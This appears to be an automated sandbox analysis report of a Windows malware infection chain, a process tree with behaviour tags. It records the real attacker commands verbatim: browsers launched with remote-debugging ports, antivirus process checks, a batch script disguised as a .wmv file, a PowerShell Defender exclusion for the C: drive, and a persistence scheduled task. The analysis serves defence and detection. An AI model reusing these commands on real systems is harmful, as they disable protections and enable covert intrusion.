- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:7200 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x174,0x178,0x17c,0x150,0x180,0x7ffc0cdbdcf8,0x7ffc0cdbdd04,0x7ffc0cdbdd108⤵PID:7216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1880,i,15829839025499435407,10160487467740039789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2600 /prefetch:38⤵PID:7508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2220,i,15829839025499435407,10160487467740039789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2208 /prefetch:28⤵PID:7516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2212,i,15829839025499435407,10160487467740039789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2740 /prefetch:88⤵PID:7544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3296,i,15829839025499435407,10160487467740039789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3364 /prefetch:18⤵
- Uses browser remote debugging
PID:7588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3304,i,15829839025499435407,10160487467740039789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3384 /prefetch:18⤵
- Uses browser remote debugging
PID:7600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4276,i,15829839025499435407,10160487467740039789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4304 /prefetch:28⤵
- Uses browser remote debugging
PID:7724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4740,i,15829839025499435407,10160487467740039789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4772 /prefetch:18⤵
- Uses browser remote debugging
PID:8164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5236,i,15829839025499435407,10160487467740039789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5272 /prefetch:88⤵PID:5680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5500,i,15829839025499435407,10160487467740039789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5512 /prefetch:88⤵PID:6476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5308,i,15829839025499435407,10160487467740039789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5624 /prefetch:88⤵PID:6616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5596,i,15829839025499435407,10160487467740039789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5440 /prefetch:88⤵PID:2656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5316,i,15829839025499435407,10160487467740039789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5704 /prefetch:88⤵PID:4260
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5272,i,15829839025499435407,10160487467740039789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5740 /prefetch:88⤵PID:2160
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
PID:4100 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2128 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7ffc0cd9f208,0x7ffc0cd9f214,0x7ffc0cd9f2209⤵PID:7976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1680,i,3447955466323887965,14004076393082542055,262144 --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:39⤵PID:7092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2452,i,3447955466323887965,14004076393082542055,262144 --variations-seed-version --mojo-platform-channel-handle=2448 /prefetch:29⤵PID:2800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2104,i,3447955466323887965,14004076393082542055,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:89⤵PID:4780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3560,i,3447955466323887965,14004076393082542055,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:19⤵
- Uses browser remote debugging
PID:6692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3528,i,3447955466323887965,14004076393082542055,262144 --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:19⤵
- Uses browser remote debugging
PID:3120
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\2nyct" & exit7⤵
- System Location Discovery: System Language Discovery
PID:1928 -
C:\Windows\SysWOW64\timeout.exetimeout /t 118⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5296
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331760101\1bd80d47f7.exe"C:\Users\Admin\AppData\Local\Temp\10331760101\1bd80d47f7.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7132
-
-
C:\Users\Admin\AppData\Local\Temp\10331770101\9a2efe8a79.exe"C:\Users\Admin\AppData\Local\Temp\10331770101\9a2efe8a79.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4932 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:8140
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331780101\2de910537b.exe"C:\Users\Admin\AppData\Local\Temp\10331780101\2de910537b.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:7476 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10331780101\2de910537b.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3332
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331790101\e74503e17b.exe"C:\Users\Admin\AppData\Local\Temp\10331790101\e74503e17b.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2836 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10331790101\e74503e17b.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5068
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331800101\U0nqzpy.exe"C:\Users\Admin\AppData\Local\Temp\10331800101\U0nqzpy.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6168
-
-
C:\Users\Admin\AppData\Local\Temp\10331810101\tK0oYx3.exe"C:\Users\Admin\AppData\Local\Temp\10331810101\tK0oYx3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:916 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:5004
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331820101\OkH8IPF.exe"C:\Users\Admin\AppData\Local\Temp\10331820101\OkH8IPF.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5064 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:7120
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331830101\zx4PJh6.exe"C:\Users\Admin\AppData\Local\Temp\10331830101\zx4PJh6.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5188 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat7⤵
- System Location Discovery: System Language Discovery
PID:4768 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3276
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:7260
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:5648
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4408248⤵PID:4236
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Architecture.wmv8⤵PID:6412
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Offensive" Inter8⤵PID:6016
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com8⤵PID:8184
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h8⤵PID:7212
-
-
C:\Users\Admin\AppData\Local\Temp\440824\Organizations.comOrganizations.com h8⤵PID:1788
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 58⤵PID:4448
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331840101\xu5e1_003.exe"C:\Users\Admin\AppData\Local\Temp\10331840101\xu5e1_003.exe"6⤵PID:4632
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:4628
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
PID:5336
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵PID:8180
-
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵PID:8152
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵PID:8056
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10331850101\qWvzIGs.exe"C:\Users\Admin\AppData\Local\Temp\10331850101\qWvzIGs.exe"6⤵PID:5988
-
-
C:\Users\Admin\AppData\Local\Temp\10331870101\01.exe"C:\Users\Admin\AppData\Local\Temp\10331870101\01.exe"6⤵PID:13152
-
C:\Windows\system32\taskkill.exe"taskkill" /f /im pcidrv.exe7⤵
- Kills process with taskkill
PID:13168
-
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "PCI Bus Driver" /tr C:\Users\Admin\Drivers\busdrv.exe /sc minute /mo 1 /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:13184
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2C5168.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2C5168.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5040
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3d01I.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3d01I.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffc0cf0dcf8,0x7ffc0cf0dd04,0x7ffc0cf0dd105⤵PID:4044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1968,i,930968430262737199,17743227699405777423,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1964 /prefetch:25⤵PID:1480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1624,i,930968430262737199,17743227699405777423,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2140 /prefetch:35⤵PID:4064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2412,i,930968430262737199,17743227699405777423,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2600 /prefetch:85⤵PID:1500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3184,i,930968430262737199,17743227699405777423,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3212 /prefetch:15⤵
- Uses browser remote debugging
PID:5372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2784,i,930968430262737199,17743227699405777423,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2856 /prefetch:15⤵
- Uses browser remote debugging
PID:3672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4256,i,930968430262737199,17743227699405777423,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4276 /prefetch:25⤵
- Uses browser remote debugging
PID:2856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4668,i,930968430262737199,17743227699405777423,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4724 /prefetch:15⤵
- Uses browser remote debugging
PID:4236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5112,i,930968430262737199,17743227699405777423,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5128 /prefetch:85⤵PID:5692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5460,i,930968430262737199,17743227699405777423,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5472 /prefetch:85⤵PID:2872
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
PID:1112 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch5⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:2328 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7ffc082af208,0x7ffc082af214,0x7ffc082af2206⤵PID:1640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1892,i,8056087136536051194,3940453776676368691,262144 --variations-seed-version --mojo-platform-channel-handle=2376 /prefetch:36⤵PID:624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2348,i,8056087136536051194,3940453776676368691,262144 --variations-seed-version --mojo-platform-channel-handle=2304 /prefetch:26⤵PID:4536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2140,i,8056087136536051194,3940453776676368691,262144 --variations-seed-version --mojo-platform-channel-handle=2408 /prefetch:86⤵PID:4592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,8056087136536051194,3940453776676368691,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:16⤵
- Uses browser remote debugging
PID:3588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3548,i,8056087136536051194,3940453776676368691,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:16⤵
- Uses browser remote debugging
PID:5080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5032,i,8056087136536051194,3940453776676368691,262144 --variations-seed-version --mojo-platform-channel-handle=5104 /prefetch:86⤵PID:6500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5056,i,8056087136536051194,3940453776676368691,262144 --variations-seed-version --mojo-platform-channel-handle=5160 /prefetch:86⤵PID:6308
-
-
